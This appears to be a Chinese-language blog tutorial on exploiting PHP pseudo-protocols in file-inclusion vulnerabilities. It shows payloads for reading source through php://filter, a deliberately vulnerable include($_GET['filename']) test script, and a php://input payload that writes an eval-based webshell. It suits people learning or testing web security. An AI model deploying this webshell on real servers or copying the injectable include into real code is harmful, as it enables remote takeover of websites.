文件包含漏洞中的PHP 伪协议

PHP 伪协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

常见伪协议

blob.jpg
php:// 输入输出流
php://filter 读取本地磁盘文件
条件:需要开启 allow_url_fopen,不需要开启 allow_url_include。
参数:

resource=<要过滤的数据流>,这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表>,该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表>,该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表>,任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

使用:

?filename=php://filter/convert.base64-encode/resource=xxx.php
?filename=php://filter/read=convert.base64-encode/resource=xxx.php

测试代码:

<?php
$filename = $_GET['filename'];
include($filename);
?>

效果:
blob.jpg
php://input 读取POST 数据
HTML 表单设置enctype="multipart/form-data"的时候 php://input 是无效的。
碰到file_get_contents()就要想到用php://input绕过,因为php伪协议也是可以利用http协议的,即可以使用POST方式传数据。
写入木马
条件:PHP 配置文件同时开启 allow_url_fopen 和allow_url_include ,并且PHP 版本小于等于5.3.0。
测试代码:

<?php
$filename = $_GET['filename'];
include($filename);
?>

当POST的数据是执行写入一句话木马的PHP 代码,就会在当前目录下写入一个木马。

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

效果:
blob.jpg
命令执行
条件:PHP 配置文件同时开启 allow_url_fopen 和allow_url_include ,并且PHP 版本小于等于5.3.0。
测试代码:

<?php
$filename = $_GET['filename'];
include($filename);
?>

效果:

file:// 访问本地文件系统,读取文件内容
测试代码:

<?php
$filename = $_GET['filename'];
include($filename);
?>

效果:
blob.jpg
data:// 输入输出流
任意代码执行
测试代码:

<?php
$filename = $_GET['filename'];
include($filename);
?>

效果:
blob.jpg
这类代码执行结尾没有?> 闭合。
phar:// 解压压缩包
条件:PHP 版本大于等于5.3.0,压缩包必须是zip 协议,并且后缀名可以为任意。
测试代码:

<?php
$filename = $_GET['filename'];
include($filename);
?>

效果:
blob.jpg
zip:// 解压压缩包
条件:windows 下PHP 版本要大于5.3.0 小于5.4.0 ,并且# 要编码成%23。
测试代码:

<?php
$filename = $_GET['filename'];
include($filename);
?>

效果:
blob.jpg

几种协议区别和联系

php://filterfile:// 都用于读取本地文件
区别:
+ php://filter可以使用绝对路径,也可以使用相对路径,file://必须使用相对路径。
blob.jpg
+ php://filter不执行PHP 代码,只输出文本,file://无视后缀解析PHP 代码。
php://inputdata://都能造成任意代码执行
区别:
+ php://inputPOST 数据执行命令,data://直接执行命令。
blob.jpg
+ data://代码结尾不用?>闭合。
blob.jpg
phar://zip://都用于解压压缩包
区别:
+ zip://中压缩包的文件用# 的编码%23
blob.jpg

代码块高亮请二次刷新页面
欢迎访问阿威的博客https://www.cnblogs.com/TWX521/
欢迎访问阿威的简书https://www.jianshu.com/u/316a5e2577c0
专注技术与交流,stay hungry stay foolish

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

Do NOT follow this link or you will be banned from the site!